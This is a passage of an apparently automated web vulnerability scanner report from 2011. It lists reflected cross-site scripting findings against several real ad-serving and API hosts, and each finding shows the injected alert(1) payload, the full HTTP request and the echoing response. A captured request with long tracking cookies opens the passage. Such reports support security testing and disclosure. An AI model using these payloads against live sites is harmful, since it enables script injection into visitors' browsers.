User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#N==#3P+HYn; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:01 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:01 GMT
Pragma: no-cache
Content-Length: 4350
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?33898"-alert(1)-"7c7717e2c00=1&Z=300x250&anmember=541&anprice=300&s=1588565&_salt=1432320579";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_pass
...[SNIP]...

2.40. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 859ac'%3balert(1)//eb6d7e629b3 was submitted in the admeld_adprovider_id parameter. This input was echoed as 859ac';alert(1)//eb6d7e629b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78859ac'%3balert(1)//eb6d7e629b3&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:36 GMT
X-Name: rtb-o08
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78859ac';alert(1)//eb6d7e629b3&external_user_id=0&expiration=1305466116" alt="" />');

2.41. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1bf5'%3balert(1)//29020a9a6e5 was submitted in the admeld_callback parameter. This input was echoed as f1bf5';alert(1)//29020a9a6e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf1bf5'%3balert(1)//29020a9a6e5 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:37 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/matchf1bf5';alert(1)//29020a9a6e5?admeld_adprovider_id=78&external_user_id=0&expiration=1305466117" alt="" />');

2.42. http://adserving2.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ab8'-alert(1)-'9dbe414d80d was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250e1ab8'-alert(1)-'9dbe414d80d&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:01 GMT
Content-Length: 778

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250e1ab8'-alert(1)-'9dbe414d80d&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanme
...[SNIP]...

2.43. http://adserving2.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57220"><script>alert(1)</script>2ef17f08d0b was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x25057220"><script>alert(1)</script>2ef17f08d0b&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:32:57 GMT
Content-Length: 848

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x25057220"><script>alert(1)</script>2ef17f08d0b&inv_code=1588565&referr
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x25057220"><script>alert(1)</script>2ef17f08d0b&s=1588565&t=2" target="parent">
...[SNIP]...

2.44. http://adserving2.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82137"><script>alert(1)</script>23748e7fa31 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=158856582137"><script>alert(1)</script>23748e7fa31 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:04 GMT
Content-Length: 848

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=158856582137"><script>alert(1)</script>23748e7fa31&referr
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=158856582137"><script>alert(1)</script>23748e7fa31&t=2" target="parent">
...[SNIP]...

2.45. http://adserving2.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a49'-alert(1)-'85e9fe16d09 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=158856585a49'-alert(1)-'85e9fe16d09 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:08 GMT
Content-Length: 778

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=158856585a49'-alert(1)-'85e9fe16d09&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anpr
...[SNIP]...

2.46. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 1eb94<script>alert(1)</script>020c643f79e was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=32&maxheight=321eb94<script>alert(1)</script>020c643f79e&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:11 GMT
Server: Apache
X-Metaweb-Cost: cc=0.016, dt=0.027, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.015
Expires: Thu, 12 May 2011 13:31:12 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:11Z;0046
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "321eb94<script>alert(1)</script>020c643f79e"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:31:11Z;0046"
}

2.47. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 19c68<script>alert(1)</script>0b3c41db23c was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=3219c68<script>alert(1)</script>0b3c41db23c&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

